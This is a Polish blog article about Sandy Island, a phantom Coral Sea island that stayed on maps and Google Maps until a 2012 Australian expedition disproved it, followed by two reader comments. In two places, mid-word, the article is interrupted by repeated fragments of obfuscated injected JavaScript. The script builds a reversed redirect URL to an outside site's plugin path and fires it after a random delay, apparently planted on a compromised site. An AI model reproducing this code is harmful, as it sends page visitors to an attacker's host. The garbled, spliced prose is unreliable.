Sandy Island – wyspa widmo…


Wyspa Sandy (Sandy Island) istniała na mapach przez ponad 130 lat… Po raz pierwszy została na nie naniesiona około roku 1880. Umieszczona pomiędzy Australią, a Nową Kaledonią na Morzu Koralowym miała mieć wielkość Manhattanu. Od tamtego momentu błąd powielano wielokrotnie.

Aż ciężko uwierzyć, ale Wyspa Sandy Island widniała na mapach nawet w dobie satelitów i Google Maps.

sandy island

Wyspa Sandy (Sandy Island) umieszczona byłą pomiędzy Australią, a Nową Kaledonią na Morzu Koralowym. Miała mieć wielkość Manhattanu.

Pierwsze wyrazy zaniepokojenia istnieniem Wyspy Sandy pojawiły się dopiero w 2000 roku, jednak brak było wystarczających dowodów aby dowieźć hipotezę. Sandy Island wciąż znajdowała się na mapach Times Atlas of the World, National Geospatial-Intelligence oraz Google Maps.

Sandy Island mapa

Wyspa Sandy na mapie.

Dopiero w 2012 roku wyprawa zorganizowana przez australijskich naukowców potwierdziła toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, że Sandy Island nie istnieje. Morze w miejscu domniemanego położenia wyspy ma 1400 metrów głębokości!

Dlaczego błąd powielano tak długo? To odludne miejsce, więc nie zwracano na nie zbytniej uwagi.

Do dziś trwają spekulacje czy wyspa kiedyś istniała, albo czy i dlaczego została naniesiona na mapy. Jedna z teorii mówi, że wyspa zniknęła po tym jak Francuzi dokonywali prób broni jądrowej w pobliżu Polinezji Francuskiej. Druga zakłada, że Sandy Island została naniesiona na mapy celowo przez kartoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tografów, którzy chcieli dowiedzieć się które z innych wydawnictw kopiuje ich mapy.

Jak było naprawdę? Chyba nigdy się nie dowiemy. Naukowcy twierdzą jednak, że podobnych niespodzianek możemy się jeszcze spodziewać.

Polecamy również:

Dodaj komentarz

Twój adres email nie zostanie opublikowany. Pola, których wypełnienie jest wymagane, są oznaczone symbolem *

6 komentarzy

  • -_-
    Wyspę tę wymyśliło jakieś ważne wydawnictwo kartograficzne ileś lat temu, aby wiedzieć, kto bezprawnie kopiuje od nich mapy. Tyle w temacie. Było przecież o tym głośno w zeszłym roku… Widzę, że artykuł powstał na bazie tylko Wikipedii.

  • Tomm zgadzam się całkowicie. Można by myśleć że odkryte zostało już wszystko co było do odkrycia. No chyba że głęboko pod wodą 🙂